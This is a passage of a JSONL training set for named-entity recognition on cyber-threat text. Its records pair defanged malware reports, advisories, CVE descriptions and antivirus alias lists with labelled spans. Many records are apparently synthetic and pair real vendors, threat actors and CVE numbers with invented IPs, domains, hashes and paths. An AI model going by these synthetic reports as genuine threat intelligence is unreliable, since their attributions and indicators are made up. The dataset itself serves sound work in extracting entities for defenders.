Chisel signatures detected in Stage 2.", "spans": {"Malware: Royal": [[22, 27]], "Indicator: b0cfa2721a8b6a7309101bd87646148d837b4d6d6a8de32a78889ded4d9841f1": [[84, 148]], "Indicator: 646c44f1b445e2676eb8121bee8b1240c81ddcf1": [[193, 233]], "Indicator: c54686ffee846c752987e1eb34720ae0ab396eff": [[282, 322]], "Indicator: f7326c08024d3709fd6f6f0bc959382c9ba86fea13d7e4e87b3f634a17e71d31": [[353, 417]], "Indicator: 107.82.67.199": [[447, 466]]}, "info": {"id": "synth_v2_01980", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix race when deleting quota root from the dirty cow roots list\n\nWhen disabling quotas we are deleting the quota root from the list\nfs_info->dirty_cowonly_roots without taking the lock that protects it,\nwhich is struct btrfs_fs_info::trans_lock. This unsynchronized list\nmanipulation may cause chaos if there's another concurrent manipulation\nof this list, such as when adding a root to it with\nctree.c:add_root_to_dirty_list().\n\nThis can result in all sorts of weird failures caused by a race, such as\nthe following crash:\n\n [337571.278245] general protection fault, probably for non-canonical address 0xdead000000000108: 0000 [#1] PREEMPT SMP PTI\n [337571.278933] CPU: 1 PID: 115447 Comm: btrfs Tainted: G W 6.4.0-rc6-btrfs-next-134+ #1\n [337571.279153] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1[ . ]14[ . ]0-0-g155821a1990b-prebuilt[ . ]qemu[ . 
]org 04/01/2014\n [337571.279572] RIP: 0010:commit_cowonly_roots+0x11f/0x250 [btrfs]\n [337571.279928] Code: 85 38 06 00 (...)\n [337571.280363] RSP: 0018:ffff9f63446efba0 EFLAGS: 00010206\n [337571.280582] RAX: ffff942d98ec2638 RBX: ffff9430b82b4c30 RCX: 0000000449e1c000\n [337571.280798] RDX: dead000000000100 RSI: ffff9430021e4900 RDI: 0000000000036070\n [337571.281015] RBP: ffff942d98ec2000 R08: ffff942d98ec2000 R09: 000000000000015b\n [337571.281254] R10: 0000000000000009 R11: 0000000000000001 R12: ffff942fe8fbf600\n [337571.281476] R13: ffff942dabe23040 R14: ffff942dabe20800 R15: ffff942d92cf3b48\n [337571.281723] FS: 00007f478adb7340(0000) GS:ffff94349fa40000(0000) knlGS:0000000000000000\n [337571.281950] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n [337571.282184] CR2: 00007f478ab9a3d5 CR3: 000000001e02c001 CR4: 0000000000370ee0\n [337571.282416] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n [337571.282647] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n [337571.282874] Call Trace:\n [337571.283101] \n [337571.283327] ? __die_body+0x1b/0x60\n [337571.283570] ? die_addr+0x39/0x60\n [337571.283796] ? exc_general_protection+0x22e/0x430\n [337571.284022] ? asm_exc_general_protection+0x22/0x30\n [337571.284251] ? commit_cowonly_roots+0x11f/0x250 [btrfs]\n [337571.284531] btrfs_commit_transaction+0x42e/0xf90 [btrfs]\n [337571.284803] ? _raw_spin_unlock+0x15/0x30\n [337571.285031] ? release_extent_buffer+0x103/0x130 [btrfs]\n [337571.285305] reset_balance_state+0x152/0x1b0 [btrfs]\n [337571.285578] btrfs_balance+0xa50/0x11e0 [btrfs]\n [337571.285864] ? __kmem_cache_alloc_node+0x14a/0x410\n [337571.286086] btrfs_ioctl+0x249a/0x3320 [btrfs]\n [337571.286358] ? mod_objcg_state+0xd2/0x360\n [337571.286577] ? refill_obj_stock+0xb0/0x160\n [337571.286798] ? seq_release+0x25/0x30\n [337571.287016] ? __rseq_handle_notify_resume+0x3ba/0x4b0\n [337571.287235] ? percpu_counter_add_batch+0x2e/0xa0\n [337571.287455] ? 
__x64_sys_ioctl+0x88/0xc0\n [337571.287675] __x64_sys_ioctl+0x88/0xc0\n [337571.287901] do_syscall_64+0x38/0x90\n [337571.288126] entry_SYSCALL_64_after_hwframe+0x72/0xdc\n [337571.288352] RIP: 0033:0x7f478aaffe9b\n\nSo fix this by locking struct btrfs_fs_info::trans_lock before deleting\nthe quota root from that list.", "spans": {"Indicator: rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org": [[911, 971]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[866, 870]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-54032"}} {"text": "A backdoor also known as: W32/Autorun.Worm.aaeh Win32.Trojan.WisdomEyes.16070401.9500.9867 TSPY_TEPFER.GB Trojan.Win32.VBTrojan.bvufrt TrojWare[ . ]Win32[ . ]VB[ . ]HR Trojan.DownLoader10.21377 TSPY_TEPFER.GB BehavesLike[.]Win32[.]Swisyn[.]cc Trojan:Win32/Beelog.C Trojan.Win32.Jorik.28672.A Trojan/Win32.Jorik.R44838 Trj/CI.A Win32/Trojan.Downloader.f2c", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: TrojWare.Win32.VB.HR": [[135, 167]], "Indicator: BehavesLike.Win32.Swisyn.cc": [[209, 242]]}, "info": {"id": "cyner2_train_004453", "source": "defanged_augment"}} {"text": "Malware Analysis Report: Emotet (SHA256: 052dcb920be5a1866a31792ad66276ac21edde89b39c16608902259658f7d822). Upon execution on MOVEit Transfer, the sample creates /var/tmp/implant.so and injects into legitimate processes. Network analysis shows beaconing to 192[.]59[.]148[.]2 every 60 seconds and DNS queries to storage-secure[ . ]site. The second stage was fetched from hxxp://mail-portal[.]com/download/update.exe and written to /usr/local/bin/ntds.dit. The payload uses PowerView-style techniques for defense evasion. 
A secondary hash (MD5: 5c47bfb1f42b0df00fa93e5f9760b569) was extracted from the unpacked payload.", "spans": {"Malware: Emotet": [[25, 31]], "Indicator: 052dcb920be5a1866a31792ad66276ac21edde89b39c16608902259658f7d822": [[41, 105]], "System: MOVEit Transfer": [[126, 141]], "Indicator: 192.59.148.2": [[257, 275]], "Indicator: storage-secure.site": [[312, 335]], "Indicator: hxxp://mail-portal.com/download/update.exe": [[371, 415]], "Indicator: 5c47bfb1f42b0df00fa93e5f9760b569": [[544, 576]]}, "info": {"id": "synth_v2_00528", "source": "defanged_augment"}} {"text": "Some example file names using this technique include : AntiVirus_update_package[.]7z , acquisition[.]7z , offer[.]7z , update_flashplayer10ax[.]7z .", "spans": {"Indicator: AntiVirus_update_package.7z": [[55, 84]], "Indicator: acquisition.7z": [[87, 103]], "Indicator: offer.7z": [[106, 116]], "Indicator: update_flashplayer10ax.7z": [[119, 146]]}, "info": {"id": "cyberner_stix_train_004581", "source": "defanged_augment"}} {"text": "Malware Analysis Report: Dridex (SHA1: 639784c521af2928bd2e87879e2e558738cbb2bb). Upon execution on Citrix NetScaler, the sample creates C:\\Program Files\\Common Files\\implant.so and injects into legitimate processes. Network analysis shows beaconing to 10 [ . ] 18 [ . ] 240 [ . ] 123 every 60 seconds and DNS queries to auth-data[.]com. The second stage was fetched from hxxps://secureapi[.]link/wp-content/uploads/doc.php and written to /etc/cron.d/sam.hive. The payload uses LinPEAS-style techniques for defense evasion. 
A secondary hash (MD5: 22828dfd50fe6b019abc606ed78cdd39) was extracted from the unpacked payload.", "spans": {"Malware: Dridex": [[25, 31]], "Indicator: 639784c521af2928bd2e87879e2e558738cbb2bb": [[39, 79]], "System: Citrix NetScaler": [[100, 116]], "Indicator: 10.18.240.123": [[253, 284]], "Indicator: auth-data.com": [[321, 336]], "Indicator: hxxps://secureapi.link/wp-content/uploads/doc.php": [[372, 423]], "Indicator: 22828dfd50fe6b019abc606ed78cdd39": [[547, 579]]}, "info": {"id": "synth_v2_00531", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nrtl818x: Prevent using not initialized queues\n\nUsing not existing queues can panic the kernel with rtl8180/rtl8185 cards.\nIgnore the skb priority for those cards, they only have one tx queue. Pierre\nAsselin (pa@panix[.]com) reported the kernel crash in the Gentoo forum:\n\nhxxps://forums[.]gentoo[.]org/viewtopic-t-1147832-postdays-0-postorder-asc-start-25.html\n\nHe also confirmed that this patch fixes the issue. In summary this happened:\n\nAfter updating wpa_supplicant from 2.9 to 2.10 the kernel crashed with a\n\"divide error: 0000\" when connecting to an AP. 
Control port tx now tries to\nuse IEEE80211_AC_VO for the priority, which wpa_supplicants starts to use in\n2.10.\n\nSince only the rtl8187se part of the driver supports QoS, the priority\nof the skb is set to IEEE80211_AC_BE (2) by mac80211 for rtl8180/rtl8185\ncards.\n\nrtl8180 is then unconditionally reading out the priority and finally crashes on\ndrivers/net/wireless/realtek/rtl818x/rtl8180/dev.c line 544 without this\npatch:\n\tidx = (ring->idx + skb_queue_len(&ring->queue)) % ring->entries\n\n\"ring->entries\" is zero for rtl8180/rtl8185 cards, tx_ring[2] never got\ninitialized.", "spans": {"Indicator: https://forums.gentoo.org/viewtopic-t-1147832-postdays-0-postorder-asc-start-25.html": [[341, 429]], "Indicator: panix.com": [[280, 291]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-49326"}} {"text": "Malware Analysis Report: PlugX (SHA1: 04e53ab7e9c48038c583633c9265f0b8e8ee092a). Upon execution on F5 BIG-IP, the sample creates C:\\Windows\\Temp\\taskhost.exe and injects into legitimate processes. Network analysis shows beaconing to 192 [ . ] 227 [ . ] 160 [ . ] 28 every 60 seconds and DNS queries to relaysync[ . ]xyz. The second stage was fetched from hxxp://backupsecure[ . ]cc/secure/token and written to C:\\Users\\admin\\AppData\\Local\\Temp\\winlogon.exe. The payload uses Certutil-style techniques for defense evasion. A secondary hash (MD5: e8e6c237398482121103362166ec3c54) was extracted from the unpacked payload.", "spans": {"Malware: PlugX": [[25, 30]], "Indicator: 04e53ab7e9c48038c583633c9265f0b8e8ee092a": [[38, 78]], "System: F5 BIG-IP": [[99, 108]], "Indicator: 192.227.160.28": [[233, 265]], "Indicator: relaysync.xyz": [[302, 319]], "Indicator: hxxp://backupsecure.cc/secure/token": [[355, 394]], "Indicator: e8e6c237398482121103362166ec3c54": [[545, 577]]}, "info": {"id": "synth_v2_00559", "source": "defanged_augment"}} {"text": "Blog Post by Proofpoint: Tracking Kimsuky's Latest Operations. 
Our research team has uncovered a new campaign leveraging CVE-2023-26043 against Active Directory deployments. The initial access vector involves spear-phishing emails from updates@account-update[ . ]xyz delivering FormBook. Post-compromise, the attackers deploy BatLoader and use Nmap for reconnaissance. C2 infrastructure includes 152 [ . ] 214 [ . ] 144 [ . ] 94 and sync-backup[.]net. A staging server at hxxps://secure-node[.]dev/api/v2/auth hosts additional tooling. Key artifact: /usr/local/bin/backdoor.elf (SHA256: 4297e10d3eb510192ad6cbd31213d4dcde9d0d0578ae29c7441598ee6c470991).", "spans": {"Organization: Proofpoint": [[13, 23]], "Vulnerability: CVE-2023-26043": [[121, 135]], "System: Active Directory": [[144, 160]], "Indicator: updates@account-update.xyz": [[236, 266]], "Malware: FormBook": [[278, 286]], "Malware: BatLoader": [[326, 335]], "Indicator: 152.214.144.94": [[396, 428]], "Indicator: sync-backup.net": [[433, 450]], "Indicator: hxxps://secure-node.dev/api/v2/auth": [[472, 509]], "Indicator: 4297e10d3eb510192ad6cbd31213d4dcde9d0d0578ae29c7441598ee6c470991": [[587, 651]]}, "info": {"id": "synth_v2_01613", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Microsoft MSRC identified a large-scale phishing operation. Emails originated from confirm@phishing-domain[.]com and it@document-share[ . ]link, spoofing legitimate services. Victims were directed to hxxps://auth-login[ . ]live/portal/verify which hosted a credential harvesting page on storagestatic[ . ]cc. A secondary link hxxp://secure-cache[ . ]com/secure/token delivered Meduza Stealer (SHA256: 66a282c45e27ce9328111ae8c1fcee81ca2c7cd7ca5b3c54dea94ade436a63d3). 
The malware was saved to C:\\Users\\Public\\Documents\\payload.bin and established C2 with 172[.]205[.]101[.]20.", "spans": {"Organization: Microsoft MSRC": [[26, 40]], "Indicator: confirm@phishing-domain.com": [[109, 138]], "Indicator: it@document-share.link": [[143, 169]], "Indicator: https://auth-login.live/portal/verify": [[226, 267]], "Indicator: storagestatic.cc": [[313, 333]], "Indicator: http://secure-cache.com/secure/token": [[352, 392]], "Malware: Meduza Stealer": [[403, 417]], "Indicator: 66a282c45e27ce9328111ae8c1fcee81ca2c7cd7ca5b3c54dea94ade436a63d3": [[427, 491]], "Indicator: 172.205.101.20": [[581, 601]]}, "info": {"id": "synth_v2_00948", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Brute Ratel artifacts at C:\\Users\\admin\\AppData\\Local\\Temp\\loader.exe. Memory dump analysis confirmed execution of GhostPack. Registry modifications pointed to persistence via /dev/shm/beacon.dll. Network forensics identified connections to 176[.]146[.]122[.]241 and cloudrelay[ . ]club. Email headers traced the initial vector to hr@phishing-domain[ . ]com. File /usr/local/bin/beacon.dll (MD5: b653caa707f8cd58a24fab7fa59a0735) was identified as the initial dropper. A staging URL hxxp://proxy-portal[.]online/panel/index.html resolved to 215 [ . ] 171 [ . ] 70 [ . ] 151. Secondary artifact hash: SHA1: b08a1ea2f3b2d40d6d2126041f168b7606ab3762.", "spans": {"Indicator: 176.146.122.241": [[313, 334]], "Indicator: cloudrelay.club": [[339, 358]], "Indicator: hr@phishing-domain.com": [[403, 429]], "Indicator: b653caa707f8cd58a24fab7fa59a0735": [[468, 500]], "Indicator: http://proxy-portal.online/panel/index.html": [[555, 600]], "Indicator: 215.171.70.151": [[613, 645]], "Indicator: b08a1ea2f3b2d40d6d2126041f168b7606ab3762": [[678, 718]]}, "info": {"id": "synth_v2_01147", "source": "defanged_augment"}} {"text": "TensorFlow is an end-to-end open source platform for machine learning. 
In affected versions an attacker can cause undefined behavior via binding a reference to null pointer in `tf.raw_ops.RaggedTensorToVariant`. The [implementation](hxxps://github[.]com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/ragged_tensor_to_variant_op.cc#L129) has an incomplete validation of the splits values, missing the case when the argument would be empty. We have patched the issue in GitHub commit be7a4de6adfbd303ce08be4332554dff70362612. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.", "spans": {"Indicator: https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/ragged_tensor_to_variant_op.cc#L129": [[233, 381]], "Indicator: be7a4de6adfbd303ce08be4332554dff70362612": [[528, 568]], "Organization: GitHub": [[514, 520]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-37666"}} {"text": "ALERT: Gh0st RAT detected on Confluence Server endpoint. Process C:\\Windows\\Temp\\debug.exe (MD5: 44a95bcfbefb0a37275dacea5d2dc1ee) initiated outbound connection to 23 [ . ] 121 [ . ] 5 [ . ] 192 resolving monitor-net[[.]]org. Immediate containment recommended.", "spans": {"Malware: Gh0st RAT": [[7, 16]], "System: Confluence Server": [[29, 46]], "Indicator: 44a95bcfbefb0a37275dacea5d2dc1ee": [[97, 129]], "Indicator: 23.121.5.192": [[164, 194]], "Indicator: monitor-net[.]org": [[205, 224]]}, "info": {"id": "synth_00083", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2024-36290 is a critical cross-site scripting affecting Active Directory. Tenable confirmed active exploitation by Flax Typhoon in the wild. Exploitation delivers REvil (SHA256: ebe5f5622b56e020c0405d60fcc24493f23f3d2ccdc4eadb3df0d5cfc45d1123) which is dropped to /dev/shm/helper.sh. 
The exploit payload is hosted at hxxps://nodesync[.]top/login and communicates to 172 [ . ] 204 [ . ] 76 [ . ] 62 for C2.", "spans": {"Vulnerability: CVE-2024-36290": [[24, 38]], "Vulnerability: cross-site scripting": [[53, 73]], "System: Active Directory": [[84, 100]], "Organization: Tenable": [[102, 109]], "Malware: REvil": [[191, 196]], "Indicator: ebe5f5622b56e020c0405d60fcc24493f23f3d2ccdc4eadb3df0d5cfc45d1123": [[206, 270]], "Indicator: hxxps://nodesync.top/login": [[345, 373]], "Indicator: 172.204.76.62": [[394, 425]]}, "info": {"id": "synth_v2_00674", "source": "defanged_augment"}} {"text": "Huntress published a threat intelligence report linking APT28 to a new campaign exploiting CVE-2020-12082 in Ubuntu 22.04. The attackers deployed Meduza Stealer via Impacket, establishing C2 communication with 129 [ . ] 54 [ . ] 148 [ . ] 202 and portalportal[.]live. A secondary payload was downloaded from hxxp://proxy-secure[ . ]io/download/update.exe. The malware binary (SHA1: 97a05e736aacd79574fe3a5d5d0b599d7bcf638e) was dropped to C:\\Users\\admin\\Desktop\\dropper.ps1. Phishing emails were sent from finance@account-update[ . ]xyz targeting enterprise users. A backup C2 server was identified at 156 [ . ] 44 [ . ] 144 [ . ] 196.", "spans": {"Organization: Huntress": [[0, 8]], "Vulnerability: CVE-2020-12082": [[91, 105]], "System: Ubuntu 22.04": [[109, 121]], "Malware: Meduza Stealer": [[146, 160]], "Indicator: 129.54.148.202": [[210, 242]], "Indicator: portalportal.live": [[247, 266]], "Indicator: hxxp://proxy-secure.io/download/update.exe": [[308, 354]], "Indicator: 97a05e736aacd79574fe3a5d5d0b599d7bcf638e": [[382, 422]], "Indicator: finance@account-update.xyz": [[506, 536]], "Indicator: 156.44.144.196": [[602, 634]]}, "info": {"id": "synth_v2_00150", "source": "defanged_augment"}} {"text": "Blog Post by Symantec: Tracking Aqua Blizzard's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2023-20659 against VMware ESXi deployments. 
The initial access vector involves spear-phishing emails from account@login-portal[ . ]tech delivering Latrodectus. Post-compromise, the attackers deploy Qbot and use Ligolo for reconnaissance. C2 infrastructure includes 172 [ . ] 50 [ . ] 111 [ . ] 172 and mailproxy[.]info. A staging server at hxxps://edgeportal[ . ]net/assets/js/payload.js hosts additional tooling. Key artifact: /var/tmp/agent.py (MD5: d18dd20df96d1fdff92806c64bddbf48).", "spans": {"Organization: Symantec": [[13, 21]], "Vulnerability: CVE-2023-20659": [[125, 139]], "System: VMware ESXi": [[148, 159]], "Indicator: account@login-portal.tech": [[235, 264]], "Malware: Latrodectus": [[276, 287]], "Malware: Qbot": [[327, 331]], "Indicator: 172.50.111.172": [[394, 426]], "Indicator: mailproxy.info": [[431, 447]], "Indicator: hxxps://edgeportal.net/assets/js/payload.js": [[469, 516]], "Indicator: d18dd20df96d1fdff92806c64bddbf48": [[581, 613]]}, "info": {"id": "synth_v2_01511", "source": "defanged_augment"}} {"text": "Malware Analysis Report: Gootloader (SHA256: 6302f4cb2eb5592f761ace9da3188c559b551f3334a41ece7c7a2655fa623944). Upon execution on Citrix NetScaler, the sample creates /opt/app/bin/runtime.dll and injects into legitimate processes. Network analysis shows beaconing to 171 [ . ] 83 [ . ] 242 [ . ] 208 every 60 seconds and DNS queries to mailnode[ . ]info. The second stage was fetched from hxxp://portalgateway[.]link/portal/verify and written to /var/tmp/sam.hive. The payload uses CrackMapExec-style techniques for defense evasion. 
A secondary hash (MD5: 4b268f56470128b36d3042d5d65d900d) was extracted from the unpacked payload.", "spans": {"Malware: Gootloader": [[25, 35]], "Indicator: 6302f4cb2eb5592f761ace9da3188c559b551f3334a41ece7c7a2655fa623944": [[45, 109]], "System: Citrix NetScaler": [[130, 146]], "Indicator: 171.83.242.208": [[267, 299]], "Indicator: mailnode.info": [[336, 353]], "Indicator: hxxp://portalgateway.link/portal/verify": [[389, 430]], "Indicator: 4b268f56470128b36d3042d5d65d900d": [[556, 588]]}, "info": {"id": "synth_v2_00613", "source": "defanged_augment"}} {"text": "CVE-2025-4654: The Soumettre[ . ]fr plugin for WordPress is vulnerable to unauthorized access and modification of data due to a improper authorization checks on the make_signature function in all versions up to, and including, 2.1.5. This makes it possible for unauthenticated attackers to create/edit/delete Soumettre posts. This vulnerability affects only installations where the soumettre account is not connected (i.e. API key is not installed)", "spans": {"Vulnerability: CVE-2025-4654": [[0, 13]], "System: WordPress": [[47, 56]], "Vulnerability: unauthorized access": [[74, 93]], "Vulnerability: improper authorization": [[128, 150]], "Indicator: Soumettre.fr": [[19, 35]]}, "info": {"id": "nvd_2025_4654", "source": "defanged_augment"}} {"text": "A backdoor also known as: Trojandownloader.Tosct Win32.Trojan.WisdomEyes.16070401.9500.9994 BKDR_WEBRV.A Trojan.Click2.39104 BKDR_WEBRV.A W32/Trojan.KRMY-0312 Trojan[.]Heur[.]JP.ED64BF TrojanDownloader:Win32/Tosct.B", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Trojan.Heur.JP": [[159, 177]]}, "info": {"id": "cyner2_train_000768", "source": "defanged_augment"}} {"text": "TensorFlow is an end-to-end open source platform for machine learning. An attacker can cause a runtime division by zero error and denial of service in `tf.raw_ops.FractionalAvgPool`. This is because the implementation(hxxps://github[ . 
]com/tensorflow/tensorflow/blob/acc8ee69f5f46f92a3f1f11230f49c6ac266f10c/tensorflow/core/kernels/fractional_avg_pool_op.cc#L85-L89) computes a divisor quantity by dividing two user controlled values. The user controls the values of `input_size[i]` and `pooling_ratio_[i]` (via the `value.shape()` and `pooling_ratio` arguments). If the value in `input_size[i]` is smaller than the `pooling_ratio_[i]`, then the floor operation results in `output_size[i]` being 0. The `DCHECK_GT` line is a no-op outside of debug mode, so in released versions of TF this does not trigger. Later, these computed values are used as arguments(hxxps://github[.]com/tensorflow/tensorflow/blob/acc8ee69f5f46f92a3f1f11230f49c6ac266f10c/tensorflow/core/kernels/fractional_avg_pool_op.cc#L96-L99) to `GeneratePoolingSequence`(hxxps://github[ . ]com/tensorflow/tensorflow/blob/acc8ee69f5f46f92a3f1f11230f49c6ac266f10c/tensorflow/core/kernels/fractional_pool_common.cc#L100-L108). There, the first computation is a division in a modulo operation. Since `output_length` can be 0, this results in runtime crashing. The fix will be included in TensorFlow 2.5.0. 
We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.", "spans": {"Indicator: https://github.com/tensorflow/tensorflow/blob/acc8ee69f5f46f92a3f1f11230f49c6ac266f10c/tensorflow/core/kernels/fractional_avg_pool_op.cc#L85-L89": [[218, 366]], "Indicator: https://github.com/tensorflow/tensorflow/blob/acc8ee69f5f46f92a3f1f11230f49c6ac266f10c/tensorflow/core/kernels/fractional_avg_pool_op.cc#L96-L99": [[859, 1005]], "Indicator: https://github.com/tensorflow/tensorflow/blob/acc8ee69f5f46f92a3f1f11230f49c6ac266f10c/tensorflow/core/kernels/fractional_pool_common.cc#L100-L108": [[1036, 1186]], "Vulnerability: denial of service": [[130, 147]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-29550"}} {"text": "A backdoor also known as: Trojan.Win32.Malware.1 Trojan.Rootkit.GGA Backdoor:W32/PcClient.ALE BACKDOOR.Trojan Backdoor:Win32/Xinia.C Trojan.Rootkit.GGA RootKit[.]Win32[.]Undef[.]ru W32/Rootkit.A SHeur.CPFS", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: RootKit.Win32.Undef.ru": [[152, 180]]}, "info": {"id": "cyner2_train_003451", "source": "defanged_augment"}} {"text": "jsoup is a Java HTML parser, built for HTML editing, cleaning, scraping, and cross-site scripting (XSS) safety. jsoup may incorrectly sanitize HTML including `javascript:` URL expressions, which could allow XSS attacks when a reader subsequently clicks that link. If the non-default `SafeList.preserveRelativeLinks` option is enabled, HTML including `javascript:` URLs that have been crafted with control characters will not be sanitized. If the site that this HTML is published on does not set a Content Security Policy, an XSS attack is then possible. This issue is patched in jsoup 1.15.3. Users should upgrade to this version. Additionally, as the unsanitized input may have been persisted, old content should be cleaned again using the updated version. 
To remediate this issue without immediately upgrading: - disable `SafeList.preserveRelativeLinks`, which will rewrite input URLs as absolute URLs - ensure an appropriate [Content Security Policy](hxxps://developer[.]mozilla[.]org/en-US/docs/Web/HTTP/CSP) is defined. (This should be used regardless of upgrading, as a defence-in-depth best practice.)", "spans": {"Indicator: https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP": [[954, 1011]], "System: Java": [[11, 15]], "Vulnerability: cross-site scripting": [[77, 97]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-36033"}} {"text": "Vulnerability Advisory: CVE-2022-28965 is a critical privilege escalation affecting Ubuntu 22.04. Zscaler ThreatLabz confirmed active exploitation by OilRig in the wild. Exploitation delivers PikaBot (SHA256: 56e500ca7d83c6220c2f8eb11cad312e1abf3982c8c1512e11e39c76ae2cd56f) which is dropped to /tmp/taskhost.exe. The exploit payload is hosted at hxxps://proxy-backup[ . ]site/download/update.exe and communicates to 192 [ . ] 82 [ . ] 45 [ . ] 107 for C2.", "spans": {"Vulnerability: CVE-2022-28965": [[24, 38]], "Vulnerability: privilege escalation": [[53, 73]], "System: Ubuntu 22.04": [[84, 96]], "Organization: Zscaler ThreatLabz": [[98, 116]], "Malware: PikaBot": [[192, 199]], "Indicator: 56e500ca7d83c6220c2f8eb11cad312e1abf3982c8c1512e11e39c76ae2cd56f": [[209, 273]], "Indicator: hxxps://proxy-backup.site/download/update.exe": [[347, 396]], "Indicator: 192.82.45.107": [[417, 448]]}, "info": {"id": "synth_v2_00812", "source": "defanged_augment"}} {"text": "NSA published a threat intelligence report linking OilRig to a new campaign exploiting CVE-2021-39439 in Citrix NetScaler. The attackers deployed SystemBC via Havoc, establishing C2 communication with 16 [ . ] 141 [ . ] 64 [ . ] 180 and portal-proxy[.]org. A secondary payload was downloaded from hxxps://gatewayportal[ . ]online/admin/config. 
The malware binary (SHA256: 2efd63356677694ca494c881d44536f0be396e2b75068ad9f144e5101318755e) was dropped to C:\\Users\\admin\\Desktop\\loader.exe. Phishing emails were sent from hr@auth-check[.]org targeting enterprise users. A backup C2 server was identified at 10 [ . ] 74 [ . ] 164 [ . ] 213.", "spans": {"Organization: NSA": [[0, 3]], "Vulnerability: CVE-2021-39439": [[87, 101]], "System: Citrix NetScaler": [[105, 121]], "Malware: SystemBC": [[146, 154]], "Indicator: 16.141.64.180": [[201, 232]], "Indicator: portal-proxy.org": [[237, 255]], "Indicator: hxxps://gatewayportal.online/admin/config": [[297, 342]], "Indicator: 2efd63356677694ca494c881d44536f0be396e2b75068ad9f144e5101318755e": [[372, 436]], "Indicator: hr@auth-check.org": [[519, 538]], "Indicator: 10.74.164.213": [[604, 635]]}, "info": {"id": "synth_v2_00098", "source": "defanged_augment"}} {"text": "A backdoor also known as: Trojan.Win32.Kolweb!O Trojan.Lokrodem.25745 Trojan.Kolweb.Win32.139 Troj.W32.Kolweb.mBu8 Trojan/Kolweb.a Win32.Trojan.WisdomEyes.16070401.9500.9687 Adware.Margoc Win32/Startpage[.]SK Win.Trojan.Kolweb-96 Trojan.Win32.Kolweb.a Trojan.Win32.Kolweb.cxqwlv Trojan.Win32.A.Kolweb.224389[ASPack] Trojan.PWS.Mirka BehavesLike.Win32.Sality.fc Trojan/Kolweb.cm TR/Delf[ . ]CF.13 Trojan/Win32.Kolweb Trojan:Win32/Lokrodem.A.dll Trojan.Win32.Kolweb.a Trojan/Win32.Kolweb.C12167 Trojan.Kolweb Trojan.Graftor.D33DE Win32.Trojan.Kolweb.Edns Trojan.PWS.Delf!+6OEG1VoGF8 Win32/Trojan.f0c", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Startpage.SK": [[194, 208]], "Indicator: Delf.CF": [[381, 392]]}, "info": {"id": "cyner2_train_005173", "source": "defanged_augment"}} {"text": "Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . Analysts in our DeepSight Managed Adversary and Threat Intelligence ( MATI ) team have found a new backdoor , Backdoor[ . 
]Powemuddy , new variants of Seedworm 's Powermud backdoor ( aka POWERSTATS ) , a GitHub repository used by the group to store their scripts , as well as several post-compromise tools the group uses to exploit victims once they have established a foothold in their network .", "spans": {"Malware: Mimikatz": [[0, 8]], "Organization: DeepSight Managed Adversary and Threat Intelligence": [[121, 172]], "Organization: MATI": [[175, 179]], "Indicator: Backdoor.Powemuddy": [[215, 237]], "Indicator: Powermud backdoor": [[268, 285]], "Malware: POWERSTATS": [[292, 302]], "Vulnerability: exploit": [[429, 436]]}, "info": {"id": "cyberner_stix_train_006912", "source": "defanged_augment"}} {"text": "A backdoor also known as: W32.LRQwegierExe.Trojan Trojan/W32[.]Small[.]14848[.]CH Trojan.Daws.17020 Trojan.Kazy.D192B Win32.Trojan.Dalixi.f Trojan-Dropper.Win32.Daws.dyru Troj.W32.KillAV.lCzy BehavesLike.Win32.VTFlooder.lh Trojan:Win32/Ghodow.A Trojan-Dropper.Win32.Daws.dyru Win32/Dalixi.A Trojan.Dalixi!sYT5S6B5t8c W32/Dloader.IQS!tr.dldr Win32/Trojan.b7f", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: W32.Small.14848.CH": [[57, 81]]}, "info": {"id": "cyner2_train_005667", "source": "defanged_augment"}} {"text": "FireEye published a threat intelligence report linking Velvet Tempest to a new campaign exploiting CVE-2020-48698 in Barracuda ESG. The attackers deployed Lumma Stealer via SharpHound, establishing C2 communication with 140[.]241[.]76[.]94 and portal-mail[ . ]io. A secondary payload was downloaded from hxxp://data-static[ . ]top/panel/index.html. The malware binary (SHA256: 3e53f8b989435e5f98f75ecaee4922b736b44e850fdf9719ff280fc6fb2cf3b6) was dropped to C:\\Windows\\Tasks\\config.dat. Phishing emails were sent from security@document-share[ . ]link targeting enterprise users. 
